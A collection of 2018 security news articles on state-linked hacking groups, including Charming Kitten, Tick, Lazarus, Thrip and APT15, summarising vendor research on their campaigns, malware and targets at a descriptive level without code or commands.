The Newscaster group made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.
Iranian Hackers used a network of fake accounts (NEWSCASTER network) on principal social media to spy on US officials and political staff worldwide, this is reported in an analysis done by iSIGHTPartners. The Charming Kitten group is also known for the abuse of Open Source Security Tools, including the BeEF.
The threat actor targeted numerous entities in Iran, the U.S., Israel, the U.K. and other countries. The hackers also hit individuals involved in academic research, human rights, and the media.
ClearSky detailed the group’s activities during 2016-2017, the report includes information related to the infrastructure used by the APT and to a new strain of malware dubbed DownPaper.
The report also linked the hacker behind the HBO security breach to the Charming Kitten, and reveals the identities of two other alleged members of the group.
Recently the experts from the Israeli cyber-security firm ClearSky Security, discovered that Charming Kitten APT creates a rogue copy (clearskysecurity.net ) of the official website of the company (clearskysec.com).
“Charming Kitten built a phishing website impersonating our company,” stats ClearkSky. “They copied pages from our public website and changed one of them to include a ‘sign in’ option with multiple services.”
“These sign-in options are all phishing pages that would send the victim’s credentials to the attackers,” ClearSky said. “Our legitimate website does not have any sign in option.”
ClearSky Cyber Security
@ClearskySec
#CharmingKitten built a phishing website impersonating our company. The fake website is clearskysecurity\.net (the real website is http://clearskysec.com ). They copied pages from our public website and changed one of them to include a "sign in" option with multiple services.
4:15 PM - Jul 1, 2018
103
106 people are talking about this
Twitter Ads info and privacy
The experts believe they have discovered the rogue website while the Iranian APT was still working on it.
“It seems that the impersonating website is still being built because some of the pages have error messages in them,” ClearSky added.
The experts discovered that the fake clearskysecurity.net domain was hosted on a server that was associated with the Charming Kitten APT by ClearSky last month.
View image on TwitterView image on TwitterView image on TwitterView image on Twitter
ClearSky Cyber Security
@ClearskySec
Potentially #CharmingKitten put BeEF in The Jewish Journal, and set up fake domains of Deutsche Welle (Germany's public international broadcaster) and Frost&Sullivan:
jewishjournal\.us
deutcshewelle\.org
deutcshewelle\.com
frostsullivan\.org
More:https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.q59o3v69qjhh …
9:57 AM - Jun 12, 2018
29
30 people are talking about this
Twitter Ads info and privacy
The server was still hosting content from previous campaigns, a further clue that link it to the Iranian hacker group.
The website appears still under development, it is likely it was not yet involved in any hacking campaign.
As the website was not finished, ClearSky doesn’t believe the Iranian hackers managed to phish anyone yet. The website was taken down after a few hours of its discovery.
Iranian hackers are becoming even more aggressive even if experts believe that they are not particularly sophisticated.
Recently we discussed the OilRig gang has been using a new Trojan in attacks aimed at targets in the Middle East.
OilRig is just one of the Iran-linked hacker crews, other groups tracked by security experts are APT33, Rocket Kitten, Cobalt Gypsy (Magic Hound), Charming Kitten (aka Newscaster and NewsBeef) and CopyKittens.
China Tick APT group targeting air-gapped systems in Asia
26.6.2018 securityaffairs APT
Palo Alto Networks experts uncovered a new operation conducted by the cyber espionage group known as Tick APT that has been targeting a secure USB drive built by a South Korean defense company.
The Tick APT group has been active for at least a decade, tracked also as Bronze Butler, it was first spotted in 2016 by Symantec and experts believe it is a China-linked threat actor. Experts highlighted the ability of the group in discovering a zero-day flaw in a software used in a certain region, such as Japan and South Korea,
The group has been targeting a secure USB drive built by a South Korean defense company, likely with the intent of compromising air-gaped systems.
The expert reported that the Tick APT group is mainly targeting Japan and South Korea, but the threat actor also targeted organizations in Russia, Singapore, and China.
The group has been observed using a variety of proprietary tools and custom malware, including Minzen, Daserf (aka Nioupale), Datper, and HomamDownloader.
“Recently, Palo Alto Networks Unit 42 discovered the Tick group targeted a specific type of secure USB drive created by a South Korean defense company.” reads the analysis published by PaloAlto Networks.
“The weaponization of a secure USB drive is an uncommon attack technique and likely done in an effort to spread to air-gapped systems, which are systems that do not connect to the public internet.”
The malicious code used in the recent attacks conducted by the Tick APT were specifically developed to target systems running Windows XP or Windows Server 2003.
According to the experts, the malware was developed with the intent of infecting older, out-of-support versions of Microsoft Windows running on Air-gapped systems that often used in government and defense environments.
The experts added that they haven’t found public reports of the attack until now, likely because the threat actor used it many years ago.
“We have not identified any public reporting on this attack, and we suspect the Tick group used the malware described in this report in attacks multiple years ago. Based on the data collected, we do not believe this malware is part of any active threat campaign.” continues the report.
The experts believe the hackers managed to compromise the secure USB drive model to install the malware on a number of infected devices, that are supposed to be certified as secure by the South Korean ITSCC.
PaloAlto Networks reported that the APT group also developed a strain of malware dubbed SymonLoader that once installed on older Windows systems machines looks for specific USB drives.
The SymonLoader was used by attackers to load and execute the malware from the secure USB drive. At the time it is not clear how the attackers have compromised the USB drives.
“Because we do not have either a compromised USB drive or the unknown malicious file, we are also unable to determine how these USB drives have been compromised.” continues Palo Alto.
“Specifically, we do not know if there has been a successful compromise in the supply-chain making these devices, or if these have been compromised post-manufacturing and distributed using other means such as social engineering.”
During the investigation, experts at Palo Alto Networks discovered an interesting sample of the malware on January 21, 2018, it is a Trojanized version of a Japanese language GO game and drops malware.
Experts associated this sample with the Tick group because the shellcode in the Trojanized Japanese game is exactly the same as that found in the Trojanized Korean programs.
“The attacker encrypted the unknown executable file and concealed it at the ending part of the secure USB storage in advance. The hidden data is not accessible through logical file operation APIs, such as ReadFile(). Instead, SymonLoader uses Logical Block Addressing (LBA) and SCSI commands to read the data physically from the particular expected location on the removable drive,” the researchers explain.
Further details, including the IoCs are reported in the analysis published by the experts.
Lazarus APT hackers leverages HWP Documents in a recent string of attacks
26.6.2018 securityaffairs APT
Security researchers at AlienVault uncovered a series of cyber attacks on cryptocurrency exchanges leveraging weaponized Hangul Word Processor HWP documents (Hangul Word Processor documents).
The string of attacks involving the HWP documents has been attributed to the North Korea-linked Lazarus APT group, and includes the hack of the South Korean virtual currency exchange Bithumb. The hackers managed to steal roughly $32 million worth of cryptocurrencies, it was the second security breach suffered by the cryptocurrency exchange that caused the shutdown of the service. The first attack was also attributed to the Lazarus APT group.
The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.
This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems. Security researchers discovered that North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.
According to security experts, the group was behind, other large-scale cyber espionage campaigns against targets worldwide, including the Troy Operation, the DarkSeoul Operation, and the Sony Picture hack.
Recently the group hit several banks in Latin America stealing tens of millions of dollars.
Earlier this month, experts at AlienVault reported that Lazarus APT has been leveraging an ActiveX zero-day vulnerability in attacks on South Korean targets.
A couple of days ago, experts at Alien Vault discovered a series of weaponized documents to target members of a recent G20 Financial Meeting.
“One malicious document appears to be targeting members of a recent G20 Financial Meeting, seeking coordination of the economic policies between the wealthiest countries. Another is reportedly related to the recent theft of $30 million from the Bithumb crypto-currency exchange in South Korea.” reads the analysis published by Alien Vault.
The HWP documents used in recent attacks include a malicious postscript code that downloads the second stage malware (either a 32 or 64 bit version of Manuscrypt).
Reports published by South Korean organizations suggest the cyberheist form Bithumb leverages malicious HWP files and started earlier in May and June. The documents involved fake resumes and are linked to previous attacks by Lazarus.
“A report by a South Korean news organisation into the investigation by a South Korean security company into the thefts shows some very familiar looking malware samples that were sent to cryptocurrency organisations” continues Alien Vault.
“Whilst we can’t be certain this malware is responsible for the thefts from Bithumb, it seems a likely suspect,”
According to the experts, malicious HWP documents from Lazarus have been reportedly targeting crypto-currency users in South Korea in June.
The attackers are also launching phishing campaigns against the users of the exchange, the Lazarus APT registered a number of cryptocurrency phishing domains, this is an anomaly considering that hackers compromised legitimate sites in past attacks. The hackers used the same phone number as a domain (itaddnet[.]com).
“It’s clear that the thefts from Lazarus won’t stop anytime soon given the gains available – the (partially successful) attempt to steal $1 billion dollars from the Bank of Bangladesh represents 3% of North Korea’s reported GDP. Thefts from South Korean organisations have the double impact of weakening their closest competitor.” concluded AlienVault
Further details, including IoCs are reported in the analysis published by AlienVault.
According to the experts, North Korea is behind the SWIFT attacks in Latin America
24.6.2018 securityaffairs APT Hacking
SWIFT hackers continue to target banks worldwide, the last string of attacks hit financial institutions across Latin America.
According to three people with knowledge of the matter cited by Cyberscoop the attacks were carried by North Korea-linked APT groups that targeted also other banks
Recent attacks hit Mexico’s Bancomext and Chile’s Bank of Chile, in both cases the attackers used a variant of the dreaded disk wiper KilllDisk to infect the systems of the banks and steal funds through the SWIFT payment system.
“North Korea was involved in both breaches, the sources said, adding that they were tied to others that haven’t yet been disclosed.” states Cyberscoop.
“Two sources reviewed inside information about the breach investigations, which are still ongoing. Confidential technical reports about the incidents are already being shared within private information sharing groups comprised of other financial institutions.”
Investigations conducted by many security firms on past security breaches always linked North Korea to the attacks against the SWIFT systems.
At the time it is not clear attack vector, but experts believe hackers targeted the banks with spear phishing campaigns or using credentials obtained from other breaches.
Bancomtext and Bank of Chile aren’t the only victims of the hackers, the Mexican financial institution Banorte suffered a similar security breach.
North Korea-linked hackers appeared as focused on financial institutions in Latin America, Eastern Europe, and Southeast Asia.
“SWIFT doesn’t comment on the attribution of cyberattacks – that is a question for law enforcement – but we can say that the cyber threat facing the financial community is fast increasing in terms of sophistication … [we’re unaware of] evidence that SWIFT’s own network or core messaging services have ever been compromised. Rather, in each of the incidents customers first suffered security breaches within their local environments.” reads statement send by a SWIFT spokesperson via email.
Once the hackers have penetrated the organizations, they will usually exploit vulnerabilities in a banks funds’ “transfer initiation environments,” to steal credentials and make fraudulent and irrevocable transfers.
Attackers also adopted “diversionary smokescreens” by using wiper malware to make hard the attribution of the attack and the response to the incidents.
“Shared malware variants between the multiple incidents, known as”MBR Killer” and “Bootwreck/killdisk,” caused systems to wipe boot data and other forensic records. The North Korean hackers have been seen using a combination of different wipers in their attacks.” added CyberScoop.
“The group who attacked the Mexican bank used both in their attack,” said Fernando Merces, a senior threat researcher with Trend Micro, an international cybersecurity firm. “There was also an MBR Killer used in a Taiwanese bank a few years ago … The financial sector sees these attacks most frequently. The attacks have been seen globally.”
The use of the MBR Killer alone doesn’t represent an evidence of the involvement of a specific threat actor because its code was posted to a cybercrime forum and was reused by a wide range of actors.
In this case, forensic experts collected other indicators suggesting the involvement of the North Korea’s “Lazarus Group” in Latin America.
“CyberScoop obtained a confidential intelligence report, labelled “TLP: Amber,” authored May 29 by New York-based intelligence firm Flashpoint. That report further connected MBR Killer to the Chile case. The report states that this module had been “leveraged to hide the evidence of successful bank network penetrations.”” concludes CyberScoop.
Even if the attackers attempted to destroy any evidence, the analysis of TTPs allows attributing the attack to Pyongyang.
“Attackers often delete any evidence of fraudulent transactions on victim’s local system, but SWIFT can … [provide] the header data of the messages that SWIFT received from the impacted organization,” the SWIFT spokesperson added.
According to the Mexican financial media outlet, El Financiero hackers compromised Mexico’s interbank transfer system, aka “Sistema de Pagos Electrónicos Interbancarios” (SPEI), with the FALLCHILL, a RAT associated with North Korea-linked APT groups.
China-linked Thrip APT group target defense and satellite firms
21.6.2018 securityaffairs APT
Symantec tracked a new APT group named Thrip that targeted0 satellite operators, telco companies and defense contractors in the US and Southeast Asia.
Chinese APT groups are always very active, experts at Symantec have tracked a new APT group named Thrip that has breached the systems of satellite operators, telecommunications companies and defense contractors in the United States and Southeast Asia.
The Thrip group has been active since 2013, but this is the first time Symantec publicly shared details of its activities.
“We’ve been monitoring Thrip since 2013 when we uncovered a spying campaign being orchestrated from systems based in China. Since our initial discovery, the group has changed its tactics and broadened the range of tools it used. Initially, it relied heavily on custom malware, but in this most recent wave of attacks, which began in 2017, the group has switched to a mixture of custom malware and living off the land tools. ” reads the analysis published by Symantec.
Thrip APT used a combination of custom malware and legitimate tools in its attacks, the list of victims is long and include a satellite communications operator.
The hackers targeted devices involved in operations and infected computers running software that monitors and controls satellites, this circumstance suggests the attackers may also interested in sabotage.
Another victim of the group is a company specializing in geospatial imaging and mapping.
“[Thrip] targeted computers running MapXtreme GIS (Geographic Information System) software which is used for tasks such as developing custom geospatial applications or integrating location-based data into other applications. It also targeted machines running Google Earth Server and Garmin imaging software.” continues the analysis.
“The satellite operator wasn’t the only communications target Thrip was interested in. The group had also targeted three different telecoms operators, all based in Southeast Asia.”
The group also targeted three telecoms firms in Southeast Asia and a defense contractor.
The arsenal of the group includes the data stealer Trojan.Rikamanu and its evolution Infostealer.Catchamas that implements more sophisticated data strealing features and evasion capabilities.
The APT group also used the Trojan.Mycicil, a keylogger that is available for sale on Chinese underground marketplaces, and the Backdoor.Spedear and Trojan.Syndicasec malware.
The Thrip APT also many legitimate tools, including the Windows SysInternals utility PSExec, PowerShell, Mimikatz, and the LogMeIn remote access software.
Further details, including IoCs are reported in the analysis published by Symantec.
China-Linked APT15 is still very active, experts found its new malware tracked as ‘MirageFox’
18.6.2018 securityaffairs APT
Following the recent hack of a US Navy contractor security experts found evidence of very recent activity by the China-linked APT group tracked as APT15.
The China-linked APT15 group (aka Ke3chang, Mirage, Vixen Panda, Royal APT and Playful Dragon) has developed a new strain of malware borrowing the code from one of the tool he used in past operations.
APT15 has been active since at least 2010, it conducted cyber espionage campaigns against targets in defense, high tech, energy, government, aerospace, manufacturing industries worldwide. The attackers demonstrated an increasing level of sophistication across the years, they used a custom-malware and various exploits in their attacks.
Across the years, security firms identified many hacking tools associated with APT15 such as Mirage, BS2005, RoyalCLI, RoyalDNS, TidePool, BMW and MyWeb.
The group has been known to target organizations in the defense, high tech, energy, government, aerospace, manufacturing and other sectors.
In March 2018, APT15 used new backdoors is an attack that was likely part of a wider operation aimed at contractors at various UK government departments and military organizations.
One of the attacks aimed at a UK-based customer of NCC Group, an organization that provides a wide range of services to the United Kingdom government. The hackers focused on government departments and military technology by targeting the customer of the company.
NCC noted at the time that the APT15 used two new backdoors, tracked as RoyalCLI and RoyalDNS.
One of the backdoors has been tracked as RoyalCLI due to a debugging path left in the binary, it is the successor of BS2005 backdoor used by the group. Both RoyalCLI and BS2005 communicate with command and control (C&C) servers via Internet Explorer using the COM interface IWebBrowser2.
The attackers utilized Windows commands to conduct reconnaissance activities, the lateral movement was conducted by using a combination of net command, mounting the C$ share of hosts and manually copying files to or from compromised hosts.
The second backdoor, tracked as RoyalDNS, uses DNS to communicate with the C&C server, once executed the command the backdoor returns output through DNS.
Researchers from security firm Intezer, has recently identified a new piece of malware linked to APT15. The discovery was casual, the experts in fact discovered the malware while searching the Mirage malware based on YARA rules created for Mirage, one of the oldest tools used by the APT15 and for the Reaver malware that was linked to cyber espionage campaigns conducted by China-linked APT groups.
“Coincidentally, following the recent hack of a US Navy contractor and theft of highly sensitive data on submarine warfare, we have found evidence of very recent activity by a group referred to as APT15, known for committing cyber espionage which is believed to be affiliated with the Chinese government.” reads the analysis published by Intezer.
“The malware involved in this recent campaign, MirageFox, looks to be an upgraded version of a tool, a RAT believed to originate in 2012, known as Mirage.”
The new malware was tracked by the researchers as MirageFox, the name comes from a string found in one of the components that borrows code from both Mirage and Reaver.
The original Mirage malware includes the code for a remote shell and the function for decrypting command and control (C&C) configuration data.
Mirage also shares code with other malware attributed to APT15, including BMW, BS2005, and particularly MyWeb. Code similarities suggest the Reaver malware was developed by the APT15.
“MirageFox functions similarly to previous malware created by APT15, first collecting information about the computer like the username, CPU information, architecture, and so forth.” continues the analysis published by Intezer.
“Then it sends this information to the C&C, opens a backdoor, and sits waiting for commands from the C&C with functionality such as modifying files, launching processes, terminating itself, and more functionality typically seen in APT15’s RATs,”
The sample analyzed by the experts was compiled on June 8 and it was uploaded to VirusTotal on June 9.
The malware leverages a legitimate McAfee binary to load malicious processes through DLL hijacking, a technique already used by in past attacks.
Intezer experts also noticed that the C&C server is configured as an internal IP address, a circumstance that confirms the sample was configured to target organization.
“If you look at it the decrypted configuration, you may notice that the IP being used for the C&C is an internal IP address. If you read the report mentioned above about RoyalAPT by NCC Group, it is mentioned that APT15 infiltrated an organization again after stealing a VPN private key, therefore we can assume this version was tailor made to an organization they have already infiltrated and are connecting to the internal network using a VPN.” continues the report.
At the time the attack vector it is still unclear, further technical details including IoCs are reported in the analysis published by the company.
“There is high confidence that MirageFox can be attributed to APT15 due to code and other similarities in the MirageFox binaries.” concludes Intezer.
“As is known about APT15, after infiltrating their target, they conduct a lot of reconnaissance work, send the commands from the C&C manually, and will customize their malware components to best suit the environment they have infected.”
China-Linked APT15 Develops New 'MirageFox' Malware
18.6.2018 securityweek APT
A cyber-espionage group believed to be operating out of China has developed a new piece of malware that appears to be based on one of the first tools used by the threat actor.
The actor is known as APT15, Ke3chang, Mirage, Vixen Panda, Royal APT and Playful Dragon, and its tools are tracked by various cybersecurity companies as Mirage, BS2005, RoyalCLI, RoyalDNS, TidePool, BMW and MyWeb. The group has been known to target organizations in the defense, high tech, energy, government, aerospace, manufacturing and other sectors.
One of APT15’s more recent attacks was uncovered last year when the hackers targeted a UK-based customer of NCC Group. The organization provides a wide range of services to the United Kingdom government and NCC believes the attackers may have targeted government departments and military technology through its customer.
NCC noted at the time that the group had improved its tools and techniques. The company had uncovered two new backdoors used by APT15, including RoyalCLI, a successor of BS2005, and RoyalDNS.
Intezer, a cybersecurity firm that specializes in recognizing code reuse, reported last week that it had identified a new piece of malware linked to APT15 based on YARA rules created for Mirage, the oldest tool used by the threat actor, and Reaver, another piece of malware previously linked by researchers to China.
The new malware, dubbed by Intezer MirageFox based on a string found in one of the components, shares code with both Mirage and Reaver. Experts have found significant similarities to the original Mirage malware, including in the code used for a remote shell and the function for decrypting command and control (C&C) configuration data.
“MirageFox functions similarly to previous malware created by APT15, first collecting information about the computer like the username, CPU information, architecture, and so forth. Then it sends this information to the C&C, opens a backdoor, and sits waiting for commands from the C&C with functionality such as modifying files, launching processes, terminating itself, and more functionality typically seen in APT15’s RATs,” Jay Rosenberg, senior security researcher at Intezer, explained in a blog post.
The sample analyzed by the security firm was compiled on June 8 and uploaded to VirusTotal one day later. While it’s unclear how the malware has been distributed to victims, Intezer has made some interesting observations about MirageFox.
The malware appears to abuse a legitimate McAfee binary to load malicious processes through DLL hijacking. APT15 has been known to use DLL hijacking in its campaigns.
Intezer also noticed that a C&C server has an internal IP address, which suggests that the sample was specifically configured for the targeted organization and that, similar to the attack described earlier this year by NCC Group, the attackers gained access to the victim’s internal network using a VPN.
It’s unclear if they are connected, but Intezer pointed out that the discovery of MirageFox coincides with reports of an attack in which hackers believed to be sponsored by China stole sensitive information from a US Navy contractor.
While previous public reports on APT15 claim the group has been around since at least 2010, Rosenberg told SecurityWeek over the weekend that he has identified a Mirage sample uploaded to VirusTotal in 2009.
Rosenberg also noted that Mirage shares code with other pieces of malware attributed to APT15, including BMW, BS2005, and particularly MyWeb. The expert also believes, based on the code they share, that the developers of APT15 malware may have also created Reaver.